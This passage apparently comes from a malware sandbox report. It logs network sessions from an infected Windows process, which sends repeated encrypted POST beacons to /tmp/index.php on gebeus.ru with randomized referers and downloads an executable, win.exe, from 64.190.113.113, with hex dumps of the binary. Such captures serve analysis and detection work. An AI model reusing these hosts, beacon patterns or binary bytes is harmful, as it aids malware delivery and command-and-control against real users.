                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.1049728189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:17.290776968 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://mmcxxioyukngeefd.org/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 145
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:17.290802002 CEST145OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 56 22 a6 95
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuV"azpqbiR\?!el2gZ\cPC[:L!C#
                                                                                    Jul 24, 2024 19:56:18.352253914 CEST137INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:18 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.1049729189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:18.372742891 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://coiniqplnikp.com/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 154
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:18.372772932 CEST154OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 72 41 b7 82
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vurA<][lW9/%5ee^(}eDY5!Q3HkNA
                                                                                    Jul 24, 2024 19:56:19.420730114 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:19 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.1049730189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:19.439707041 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://sijoltnxjfxqjw.org/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 131
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:19.439729929 CEST131OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 5b 49 b0 e7
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu[IL6[w`8*EsIUO?zd
                                                                                    Jul 24, 2024 19:56:20.746268988 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:20 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.1049731189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:20.757302999 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://uwqwnifeydwej.com/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 179
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:20.757581949 CEST179OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 6e 1d e4 89
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vunK;~}RR7ts2W|~v^Da^vT??B'q{B.!55Vq]y
                                                                                    Jul 24, 2024 19:56:21.836607933 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:21 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.1049732189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:21.848895073 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://jpenaelwjof.org/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 175
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:21.848895073 CEST175OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 4d 2f d0 be
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuM/(a{_v:Z[Hl|4_cUku>PQ\P#A+B%qHF;
                                                                                    Jul 24, 2024 19:56:22.971920013 CEST185INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:22 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10
                                                                                    Data Ascii: #\/_$hDm'&B


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.104973364.190.113.113803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:24.069581985 CEST159OUTGET /win.exe HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: 64.190.113.113
                                                                                    Jul 24, 2024 19:56:24.675224066 CEST1236INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:56:24 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Mon, 22 Jul 2024 19:29:34 GMT
                                                                                    ETag: "f1600-61ddb109e6b16"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 988672
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-msdos-program
                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdlZA"\Z@p`xD`X.text `.rdataPL@@.data0 @.CRTP@@.relocX`@B
                                                                                    Jul 24, 2024 19:56:24.675364017 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 57
                                                                                    Data Ascii: AWAVAUATVWUSHH-Xl$(D5QDt$0D$(D$48AcqAqw3A]Uqw3fffff.=#Y=8=|(=/2t=uL$&D$'0GwAE
                                                                                    Jul 24, 2024 19:56:24.675379992 CEST1236INData Raw: d2 0f 44 f7 45 84 c9 0f 44 f7 66 90 81 fe 89 ee d9 12 7f 78 81 fe 3a c2 31 ce 0f 8f fc 00 00 00 81 fe 05 3b ec ae 0f 8f 0c 02 00 00 81 fe 5d 9b 1e 9c 0f 8f d5 03 00 00 81 fe 3b d2 d3 8c 0f 8e 63 07 00 00 81 fe f8 a0 fd 96 0f 8e 29 0c 00 00 81 fe
                                                                                    Data Ascii: DEDfx:1;];c)EC5uD$D$DL$hf|K4@0|:<6.:8:899: L$X
                                                                                    Jul 24, 2024 19:56:24.676071882 CEST1236INData Raw: fb ff ff 81 fe 94 f4 98 0a 0f 8e d5 05 00 00 81 fe 06 5d 3b 0f 0f 8e c8 0a 00 00 81 fe 07 5d 3b 0f 0f 84 3d 13 00 00 81 fe 64 e5 f0 10 0f 84 4b 13 00 00 81 fe e1 5c 3f 11 0f 85 f9 fa ff ff 44 8b 8c 24 f8 00 00 00 44 0f af 8c 24 d0 01 00 00 45 89
                                                                                    Data Ascii: ];];=dK\?D$D$EAE!D$999Tv){*{"}V2~D$D$ D$D$$D$D$(DYAyA=I
                                                                                    Jul 24, 2024 19:56:24.676086903 CEST1236INData Raw: f6 ff ff 81 fe 49 fa 3f 58 0f 8f bd 08 00 00 81 fe e3 62 e0 55 0f 84 5c 11 00 00 81 fe cd ae cd 56 0f 85 3d f6 ff ff 4c 8b 8c 24 50 02 00 00 45 0f b6 09 44 8b 74 24 2c 41 ff c6 44 8b 54 24 2c 47 88 0c 10 44 8b 8c 24 64 01 00 00 44 89 8c 24 c4 00
                                                                                    Data Ascii: I?XbU\V=L$PEDt$,ADT$,GD$dD$PG$DL$0D$/^^Y|$F~_u\(DL$<D$D$ D$?}:E@?~DL$HAD$X
                                                                                    Jul 24, 2024 19:56:24.676795006 CEST1236INData Raw: 44 89 8c 24 cc 00 00 00 e9 83 f1 ff ff 81 fe 88 fe 14 5e 0f 84 b6 0f 00 00 81 fe 10 59 3f 5f 0f 85 6b f1 ff ff 44 8b 0d 64 fe 0e 00 44 8b 15 61 fe 0e 00 44 89 94 24 90 01 00 00 45 8d 51 01 45 0f af d1 45 89 d1 41 83 f1 fe 45 21 d1 44 89 8c 24 94
                                                                                    Data Ascii: D$^Y?_kDdDaD$EQEEAE!D$1TOZD$DL$8D$DL$<DL$8AAh%AtDL$DL$ DL$8D$DL$<D$:CeE
                                                                                    Jul 24, 2024 19:56:24.676810026 CEST1236INData Raw: c1 44 89 8c 24 d8 01 00 00 44 8b 4c 24 68 46 0f b6 0c 09 44 88 4c 24 24 be 94 64 3b 6f e9 9a ec ff ff 81 fe a4 16 e3 71 0f 84 95 0e 00 00 81 fe 1c 4e 37 72 0f 85 82 ec ff ff be 5a 4e fa 05 e9 78 ec ff ff 81 fe 19 68 60 cc 0f 84 ad 0e 00 00 81 fe
                                                                                    Data Ascii: D$DL$hFDL$$d;oqN7rZNxh`}`Vh%7%>4PDDD$EQEAD$VS{TD
                                                                                    Jul 24, 2024 19:56:24.677608013 CEST1236INData Raw: ff c1 44 89 8c 24 e4 01 00 00 be 1f c5 74 ff e9 d4 e7 ff ff 44 8b 4c 24 60 45 01 c9 44 89 8c 24 a8 01 00 00 be 14 af 62 29 e9 ba e7 ff ff 44 8b 4c 24 4c 49 01 c9 4c 89 8c 24 50 02 00 00 be cd ae cd 56 e9 a0 e7 ff ff be 30 c4 7f a1 e9 96 e7 ff ff
                                                                                    Data Ascii: D$tDL$`ED$b)DL$LIL$PV0DL$DT$DD0ZNZNfN7r\DAAD$DL|A1'AAL|E1D@0t+AL$D$D$DL$|D$
                                                                                    Jul 24, 2024 19:56:24.677622080 CEST1236INData Raw: e1 01 44 88 4c 24 20 be ad 22 aa 0e e9 03 e3 ff ff 44 8b 4c 24 34 44 89 8c 24 a8 00 00 00 be 0a 46 7e 5f 44 8b 8c 24 8c 01 00 00 44 89 8c 24 98 00 00 00 e9 dc e2 ff ff be fa 14 3a 43 e9 d2 e2 ff ff 44 8b 94 24 14 02 00 00 45 85 d2 40 0f 94 c6 44
                                                                                    Data Ascii: DL$ "DL$4D$F~_D$D$:CD$E@D$A@@0*{*{uAMEED$DL$`D$DL$dDL$`AAD$DL$`AAqNYAC];9$4D$D$0A
                                                                                    Jul 24, 2024 19:56:24.678333044 CEST1236INData Raw: ff 44 8b 4c 24 04 45 01 c9 44 89 8c 24 78 01 00 00 be 1e 54 4f a7 e9 25 de ff ff 44 0f b6 4c 24 1a 44 0f b6 54 24 1b 44 89 ce 44 30 d6 be e6 06 77 6f bf e6 06 77 6f 0f 85 f5 dd ff ff bf 70 fb e4 68 e9 eb dd ff ff 44 8b 0d f2 ea 0e 00 44 8b 15 ef
                                                                                    Data Ascii: DL$ED$xTO%DL$DT$DD0wowophDDD$EQEEAE!D$-WDL$,L$8EDL$4DT$41A9@3A9AAD$U&OuD$DL$PD$D$L$ E
                                                                                    Jul 24, 2024 19:56:24.680499077 CEST1236INData Raw: f7 e9 36 fd ff ff 3d 94 d2 e7 1c 0f 84 70 01 00 00 3d ac f6 9c 2b 0f 85 20 fd ff ff b8 10 c6 f2 de e9 16 fd ff ff 83 7d c8 00 0f 94 c0 0a 45 e5 0f b6 c0 83 e0 01 f7 d8 89 45 c4 b8 8e f5 c1 05 e9 f7 fc ff ff 48 8b 45 a8 c6 00 13 48 8b 45 e8 c6 40
                                                                                    Data Ascii: 6=p=+ }EEHEHE@HE@HE@HE@HE@HEHHE`H)HHE H)HHE %vHMH H EEHEHERSbF


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.1049734189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:25.685601950 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://tfqtvoxxlfyfid.org/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 330
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:25.685638905 CEST330OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 06 6b 2c 90 f4 76 0b 75 7a 19 cf e7
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA ,[k,vuzt5D{[D3|.llD"|G!h (]WA6mMH~q!_v (D.=`6pI&TkS/?-
                                                                                    Jul 24, 2024 19:56:26.858165026 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:26 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.1049735189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:26.872417927 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://mhvibsdewxn.org/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 328
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:26.872442007 CEST328OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 64 57 e9 ab
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vudWjOjR~%MLeOLlaGh]<OVrF(-2{QbR8%ht:*v>(G!);[YjZCn
                                                                                    Jul 24, 2024 19:56:27.937855959 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:27 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
